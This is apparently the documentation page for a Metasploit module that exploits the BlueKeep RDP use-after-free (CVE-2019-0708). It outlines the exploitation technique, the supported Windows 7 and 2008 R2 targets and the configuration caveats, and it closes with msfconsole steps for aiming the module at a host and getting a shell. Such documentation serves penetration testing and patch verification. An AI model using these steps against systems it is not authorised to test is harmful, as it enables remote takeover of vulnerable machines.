CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
The RDP termdd.sys
driver improperly handles binds to internal-only channel MS_T120
,
allowing a malformed Disconnect Provider Indication
message to cause use-after-free.
With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
the freed channel is used to achieve arbitrary code execution.
Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.
Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout.
HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam
needs to be set to 0
for exploitation to succeed against Windows Server 2008 R2.
This is a non-standard configuration for normal servers, and the target will crash if
the aforementioned Registry key is not set!
If the target is crashing regardless, you will likely need to determine the non-paged
pool base in kernel memory and set it as the GROOMBASE
option.
This exploit module currently targets these Windows systems running on several virtualized and physical targets.
- Windows 7 SP1 x64
- Windows 2008 R2 x64
XP and 2003 are currently not supported. Please see available targets by running the show targets
command.
- Start
msfconsole
-
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
-
set RHOSTS
to Windows 7/2008 x64 -
set TARGET
based on target host characteristics -
set PAYLOAD
-
exploit
- Verify that you get a shell
- Verify that you do not crash